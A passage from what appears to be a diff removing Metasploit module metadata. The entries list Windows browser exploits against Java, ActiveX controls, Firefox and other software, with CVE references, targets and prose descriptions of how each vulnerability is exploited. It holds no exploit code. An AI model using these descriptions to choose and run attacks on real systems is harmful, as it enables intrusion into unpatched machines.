This will take some time in the users browser.", - "references": [ - "CVE-2012-5896", - "OSVDB-80662", - "BID-52765", - "EDB-18674" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP/Vista SP0-SP3 (IE6/IE7)", - "Windows XP SP0-SP3 DEP bypass (IE8)", - "Windows 7/Vista ALSR/DEP bypass (IE8)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb", - "is_install_path": true, - "ref_name": "windows/browser/intrust_annotatex_add", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_basicservice_impl": { - "name": "Sun Java Web Start BasicServiceImpl Code Execution", - "fullname": "exploit/windows/browser/java_basicservice_impl", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "Matthias Kaiser", - "egypt " - ], - "description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. 
By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"", - "references": [ - "CVE-2010-3563", - "OSVDB-69043", - "URL-http://mk41ser.blogspot.com" - ], - "platform": "Java,Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Generic (Java Payload)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_basicservice_impl.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_basicservice_impl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_cmm": { - "name": "Java CMM Remote Code Execution", - "fullname": "exploit/windows/browser/java_cmm", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-01", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. 
This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.", - "references": [ - "CVE-2013-1493", - "OSVDB-90737", - "BID-58238", - "URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493", - "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html", - "URL-http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034" - ], - "platform": "Java,Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Generic (Java Payload)", - "Windows x86 (Native Payload)" - ], - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/exploits/windows/browser/java_cmm.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_cmm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_codebase_trust": { - "name": "Sun Java Applet2ClassLoader Remote Code Execution", - "fullname": "exploit/windows/browser/java_codebase_trust", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-02-15", - "type": "exploit", - "author": [ - "Frederic Hoguin", - "jduck " - ], - "description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. 
A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.", - "references": [ - "CVE-2010-4452", - "OSVDB-71193", - "ZDI-11-084", - "URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/", - "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html" - ], - "platform": "Java", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Generic (Java Payload)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_codebase_trust.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_codebase_trust", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_docbase_bof": { - "name": "Sun Java Runtime New Plugin docbase Buffer Overflow", - "fullname": "exploit/windows/browser/java_docbase_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. 
A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.", - "references": [ - "CVE-2010-3552", - "OSVDB-68873", - "BID-44023", - "URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html", - "ZDI-10-206", - "URL-http://code.google.com/p/skylined/issues/detail?id=23", - "URL-http://web.archive.org/web/20130119152812/http://skypher.com:80/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/", - "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal (msvcr71.dll ROP)" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/java_docbase_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_docbase_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_mixer_sequencer": { - "name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", - "fullname": "exploit/windows/browser/java_mixer_sequencer", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-03-30", - "type": "exploit", - 
"author": [ - "Peter Vreugdenhil", - "juan vazquez " - ], - "description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.", - "references": [ - "CVE-2010-0842", - "OSVDB-63493", - "BID-39077", - "ZDI-10-060", - "URL-http://web.archive.org/web/20210624004250/http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows / Java 6 <=u18" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_mixer_sequencer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_ws_arginject_altjvm": { - "name": "Sun Java Web Start Plugin Command Line Argument Injection", - "fullname": "exploit/windows/browser/java_ws_arginject_altjvm", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-04-09", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. 
The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", - "references": [ - "CVE-2010-0886", - "CVE-2010-1423", - "OSVDB-63648", - "BID-39346", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html", - "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Java Runtime on Windows x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_ws_arginject_altjvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_ws_double_quote": { - "name": "Sun Java Web Start Double Quote Injection", - "fullname": "exploit/windows/browser/java_ws_double_quote", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-10-16", - "type": "exploit", - "author": [ - "Rh0 " - ], - "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. 
Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.", - "references": [ - "CVE-2012-1533", - "OSVDB-86348", - "BID-56046", - "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html", - "URL-http://pastebin.com/eUucVage " - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_ws_double_quote.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_ws_double_quote", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_ws_vmargs": { - "name": "Sun Java Web Start Plugin Command Line Argument Injection", - "fullname": "exploit/windows/browser/java_ws_vmargs", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-02-14", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. 
The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", - "references": [ - "CVE-2012-0500", - "OSVDB-79227", - "BID-52015", - "URL-https://seclists.org/fulldisclosure/2012/Feb/251", - "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Java Runtime on Windows x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_ws_vmargs.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_ws_vmargs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/juniper_sslvpn_ive_setupdll": { - "name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/juniper_sslvpn_ive_setupdll", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-04-26", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. 
By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.", - "references": [ - "CVE-2006-2086", - "OSVDB-25001", - "BID-17712", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP3 English", - "Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb", - "is_install_path": true, - "ref_name": "windows/browser/juniper_sslvpn_ive_setupdll", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/kazaa_altnet_heap": { - "name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/kazaa_altnet_heap", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2007-5217", - "OSVDB-37785", - "URL-http://web.archive.org/web/20071014051150/http://secunia.com:80/advisories/26970" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / IE 6.0SP1 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb", - "is_install_path": true, - "ref_name": "windows/browser/kazaa_altnet_heap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": null - }, - "exploit_windows/browser/keyhelp_launchtripane_exec": { - "name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability", - "fullname": "exploit/windows/browser/keyhelp_launchtripane_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-26", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. 
It is enabled and automatically started by default on\n Windows XP SP3", - "references": [ - "CVE-2012-2516", - "OSVDB-83311", - "BID-55265", - "ZDI-12-169", - "URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/keyhelp_launchtripane_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/logitechvideocall_start": { - "name": "Logitech VideoCall ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/logitechvideocall_start", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-05-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). 
By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-2918", - "OSVDB-36820", - "BID-24254" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/logitechvideocall_start.rb", - "is_install_path": true, - "ref_name": "windows/browser/logitechvideocall_start", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/lpviewer_url": { - "name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/lpviewer_url", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-06", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). 
When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-4384", - "OSVDB-48946", - "US-CERT-VU-848873", - "BID-31604" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/lpviewer_url.rb", - "is_install_path": true, - "ref_name": "windows/browser/lpviewer_url", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/macrovision_downloadandexecute": { - "name": "Macrovision InstallShield Update Service Buffer Overflow", - "fullname": "exploit/windows/browser/macrovision_downloadandexecute", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-10-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). 
By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-5660", - "OSVDB-38347" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1 Pro English", - "Windows 2000 Pro English All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb", - "is_install_path": true, - "ref_name": "windows/browser/macrovision_downloadandexecute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/macrovision_unsafe": { - "name": "Macrovision InstallShield Update Service ActiveX Unsafe Method", - "fullname": "exploit/windows/browser/macrovision_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2007-10-20", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.", - "references": [ - "CVE-2007-5660", - "OSVDB-38347", - "BID-26280" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/macrovision_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/macrovision_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/malwarebytes_update_exec": { - "name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution", - "fullname": "exploit/windows/browser/malwarebytes_update_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-12-16", - 
"type": "exploit", - "author": [ - "Yonathan Klijnsma", - "Gabor Seljan", - "todb " - ], - "description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.", - "references": [ - "CVE-2014-4936", - "OSVDB-116050", - "URL-http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/malwarebytes_update_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/maxthon_history_xcs": { - "name": "Maxthon3 about:history XCS Trusted Zone Code Execution", - "fullname": "exploit/windows/browser/maxthon_history_xcs", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-11-26", - "type": "exploit", - "author": [ - "Roberto Suggi Liverani", - "sinn3r ", - "juan vazquez " - ], - "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. 
Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.", - "references": [ - "OSVDB-88191", - "EDB-23225", - "URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Maxthon 3 (prior to 3.3) on Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb", - "is_install_path": true, - "ref_name": "windows/browser/maxthon_history_xcs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mcafee_mcsubmgr_vsprintf": { - "name": "McAfee Subscription Manager Stack Buffer Overflow", - "fullname": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-08-01", - "type": "exploit", - "author": [ - "skape " - ], - "description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.", - "references": [ - "CVE-2006-3961", - "OSVDB-27698", - "BID-19265" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb", - "is_install_path": true, - "ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/browser/mcafee_mvt_exec": { - "name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability", - "fullname": "exploit/windows/browser/mcafee_mvt_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-04-30", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.", - "references": [ - "CVE-2012-4598", - "OSVDB-81657", - "EDB-18805", - "URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/mcafee_mvt_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mcafeevisualtrace_tracetarget": { - "name": "McAfee Visual Trace ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/mcafeevisualtrace_tracetarget", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-07-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). 
By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2006-6707", - "OSVDB-32399", - "URL-http://web.archive.org/web/20061223042405/http://secunia.com:80/advisories/23463/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP2 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb", - "is_install_path": true, - "ref_name": "windows/browser/mcafeevisualtrace_tracetarget", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mirc_irc_url": { - "name": "mIRC IRC URL Buffer Overflow", - "fullname": "exploit/windows/browser/mirc_irc_url", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-10-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in mIRC 6.1. 
By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.", - "references": [ - "CVE-2003-1336", - "OSVDB-2665", - "BID-8819" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mirc_irc_url.rb", - "is_install_path": true, - "ref_name": "windows/browser/mirc_irc_url", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_attribchildremoved": { - "name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free", - "fullname": "exploit/windows/browser/mozilla_attribchildremoved", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-12-06", - "type": "exploit", - "author": [ - "regenrecht", - "Lincoln ", - "corelanc0d3r " - ], - "description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. 
By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.", - "references": [ - "CVE-2011-3659", - "OSVDB-78736", - "ZDI-12-110", - "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP - Firefox 8 / 8.0.1", - "Windows XP - Firefox 9", - "Windows XP - Firefox 9.0.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb", - "is_install_path": true, - "ref_name": "windows/browser/mozilla_attribchildremoved", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mozilla_firefox_onreadystatechange": { - "name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", - "fullname": "exploit/windows/browser/mozilla_firefox_onreadystatechange", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-25", - "type": "exploit", - "author": [ - "Nils", - "Unknown", - "w3bd3vil", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.", - "references": [ - "CVE-2013-1690", - "OSVDB-94584", - "BID-60778", - 